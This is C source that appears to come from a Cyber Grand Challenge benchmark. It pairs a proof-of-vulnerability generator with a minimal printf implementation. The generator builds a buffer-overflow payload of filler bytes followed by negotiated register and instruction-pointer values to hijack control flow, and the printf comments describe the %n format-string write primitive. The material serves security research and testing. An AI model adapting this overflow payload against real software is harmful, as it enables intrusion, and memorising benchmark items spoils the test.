/*
 * Type-1 PoV (proof-of-vulnerability input generator) for a CGC challenge.
 * It negotiates the type-1 parameters and then writes one crafted input to
 * STDOUT: a short header line, a 95-byte key string, a decimal length, a
 * 4-byte binary item count and finally the bit-packed payload. Everything
 * below is protocol glue around helpers that are not visible in this file
 * (transmit_all, append_var, bit_new/bit_write, _print_signed), so the
 * comments describe only what this function does with them.
 */
int main(void) {
    /* The two 0xfefefefe values and the 5 look like the ip mask, register
     * mask and register number of a type-1 negotiation. NOTE(review): that is
     * the PoV library's contract — confirm against negotiate_type1(). */
    negotiate_type1(0xfefefefe, 0xfefefefe, 5);

    int i, buf_len = 0;
    char buf[32], *pbuf;                       /* scratch for the decimal length */
    unsigned char exploit[4096];               /* bit-packed payload: 2324 9-bit items = 2615 bytes, fits */
    unsigned char *eip = NULL, *reg = NULL;    /* negotiated TYPE1_IP / TYPE1_REG values */
    unsigned int eip_len = 0, reg_len = 0, exp_len = 0;
    /* All 95 printable ASCII characters 0x20..0x7e, in order. */
    char *key = " !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~";

    transmit_all(STDOUT, "2\n", 2);
    transmit_all(STDOUT, key, 95);   /* 95 is the literal's length; no terminator is sent */

    /* Fetch the negotiated values. Nothing here checks eip_len / reg_len,
     * yet the loops below read 4 bytes of each — TODO confirm append_var()
     * always yields at least 4 bytes (and whether the buffers it returns
     * must be freed; they are not freed here). */
    eip = append_var("TYPE1_IP", eip, &eip_len);
    reg = append_var("TYPE1_REG", reg, &reg_len);

    memset(exploit, 0, sizeof(exploit));
    bio_t *bio = bit_new(exploit);   /* bit-level writer over exploit[] */

    /* Payload layout; every item is a 0 bit followed by 8 data bits
     * (9 bits per item — presumably the consumer's framing):
     *   2316 x 'A' filler, then the 4 register bytes, then the 4 eip bytes. */
    for (i = 0; i < 2316; ++i)
    {
        bit_write(bio, '\x00', 1);
        bit_write(bio, '\x41', 8);
    }
    for (i = 0; i < 4; ++i)
    {
        bit_write(bio, '\x00', 1);
        bit_write(bio, reg[i], 8);
    }
    for (i = 0; i < 4; ++i)
    {
        bit_write(bio, '\x00', 1);
        bit_write(bio, eip[i], 8);
    }

    /* Bytes used: whole bytes written, plus one if a partial byte is pending. */
    exp_len = bio->didx + !!(bio->bidx > 0);
    /* Decimal payload size including the 4-byte count that precedes it.
     * _print_signed() appears to lay the digits out ending at buf + 32 and
     * report the start pointer / length via pbuf and buf_len — confirm. */
    pbuf = _print_signed(buf + 32, &buf_len, exp_len + 4);
    transmit_all(STDOUT, pbuf, buf_len);
    transmit_all(STDOUT, "\n", 1);
    /* Item count (2316 + 4 + 4 = 2324), sent as 4 raw bytes in host byte
     * order; buf_len is merely reused as the carrier. */
    buf_len = 2316 + 4 + 4;
    transmit_all(STDOUT, (char *)&buf_len, 4);
    transmit_all(STDOUT, exploit, exp_len);
    return 0;
}
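/*
 * Minimal printf engine. Walks fmt, hands literal runs and formatted
 * conversions to consumer(arg, buf, len), and returns the total number of
 * bytes the consumer accepted, or -1 as soon as the consumer reports an
 * error (n < 0). A short write (n < requested) stops formatting early and
 * returns what was written so far.
 *
 * Supported: %%, %d/%i, %u/%o/%x/%X, %s, %n; flag '0'; a decimal field
 * width; length modifiers 'h' (16-bit) and 'H' (8-bit). 'l' is accepted but
 * has no effect, since every numeric conversion reads an int-sized argument.
 *
 * fmt must be a trusted literal: %n writes through a pointer argument and %s
 * dereferences one, so an attacker-controlled format string turns this into
 * an arbitrary read/write primitive.
 *
 * Fixes relative to the previous revision: the length modifier is reset per
 * conversion (it used to leak from "%hd" into a later plain "%d"), and the
 * field width accepts digits only (strtoul() also took a sign, so "%-5d"
 * yielded a width of (unsigned)-5 and padded for billions of bytes).
 */
static int _printf(consumer_t consumer, void *arg, const char *fmt, va_list ap)
{
    char tmpbuf[32]; /* must be at least 32 bytes for _print_base */
    const char *fmtstr = NULL;   /* start of the pending literal run, or NULL */
    char modifier = 0;           /* 'h', 'H', 'l' or 0; reset for every conversion */
    int n, total = 0;

/* Hand (b, c) to the consumer. Stops on error (-1) or on a short write. */
#define CONSUME(b, c) \
    do { \
        size_t tmp = (size_t)(c); \
        if (tmp == 0) break; \
        total += (n = consumer(arg, (b), tmp)); \
        if (n < 0) goto error; \
        if ((size_t)n < tmp) goto done; \
    } while (0)

/* Emit the literal text accumulated since fmtstr as one consumer call. */
#define FLUSH() \
    do { \
        if (fmtstr) { \
            CONSUME(fmtstr, fmt-fmtstr); \
            fmtstr = NULL; \
        } \
    } while (0)

    while (*fmt)
    {
        int flags = 0;
#define FLAG_ZERO_PADDING 0x01
        unsigned int field_width = 0;

        if (*fmt != '%')
        {
            /* literal text is batched and flushed before the next conversion */
            if (fmtstr == NULL)
                fmtstr = fmt;
            fmt++;
            continue;
        }

        FLUSH();

        fmt++;
        if (*fmt == '%')
        {
            CONSUME(fmt, 1);
            fmt++;
            continue;
        }

        /* per-conversion state: a modifier applies to one conversion only */
        modifier = 0;

        /* process flags */
        while (1)
        {
            switch (*fmt)
            {
            case '0':
                flags |= FLAG_ZERO_PADDING;
                fmt++;
                break;
            default:
                goto flags_done;
            }
        }

flags_done:
        /* process field width: decimal digits only, no sign or whitespace */
        while (*fmt >= '0' && *fmt <= '9')
        {
            field_width = field_width * 10 + (unsigned int)(*fmt - '0');
            fmt++;
        }

        /* process modifiers */
        switch (*fmt)
        {
        case 'H':
        case 'h':
        case 'l':
            modifier = *fmt;
            fmt++;
            break;
        default:
            break;
        }

        /* process conversion */
        char *tmpstr;
        int base, outlen, sv;
        unsigned int uv;
        void *pv;
        switch(*fmt)
        {
        case 'd':
        case 'i':
            sv = va_arg(ap, int);
            /* narrow to the requested width, then widen back as a signed value */
            if (modifier == 'h') sv = (short)(sv & 0xffff);
            else if (modifier == 'H') sv = (signed char)(sv & 0xff);
            tmpstr = _print_signed(tmpbuf + 32, &outlen, sv);
            /* left padding is emitted before the whole string, so with '0' a
             * negative value gets zeros ahead of its sign */
            while (field_width > (unsigned int)outlen)
            {
                CONSUME((flags & FLAG_ZERO_PADDING) ? "0" : " ", 1);
                field_width--;
            }
            CONSUME(tmpstr, outlen);
            fmt++;
            break;
        case 'u':
        case 'o':
        case 'x':
        case 'X':
            if (*fmt == 'u') base = 10;
            else if(*fmt == 'o') base = 8;
            else base = 16;
            uv = va_arg(ap, unsigned int);
            if (modifier == 'h') uv &= 0xffff;
            else if (modifier == 'H') uv &= 0xff;
            tmpstr = _print_base(tmpbuf + 32, &outlen, uv, base, *fmt == 'X');
            while (field_width > (unsigned int)outlen)
            {
                CONSUME((flags & FLAG_ZERO_PADDING) ? "0" : " ", 1);
                field_width--;
            }
            CONSUME(tmpstr, outlen);
            fmt++;
            break;
        case 'n':
            /* SECURITY: %n stores the running byte count through a pointer
             * taken from the argument list. With a non-literal fmt this is
             * the classic arbitrary-write primitive; keep fmt trusted or
             * remove this conversion. */
            pv = va_arg(ap, void *);
            if (modifier == 'h') *(short int *)pv = total;
            else if (modifier == 'H') *(signed char *)pv = total;
            else *(int *)pv = total;
            fmt++;
            break;
        case 's':
            pv = va_arg(ap, void *);
            /* no NULL check: cgc_strlen(NULL) would fault — callers are
             * presumably required never to pass NULL; confirm */
            CONSUME((char *)pv, cgc_strlen((char *)pv));
            fmt++;
            break;
        default:
            /* Unknown conversion (or the terminating '\0'): nothing is
             * consumed here. A non-'%' character is re-scanned as literal
             * text on the next iteration, so "%q" prints "q". */
            break;
        }
    }
    FLUSH();

done:
    return total;
error:
    return -1;
}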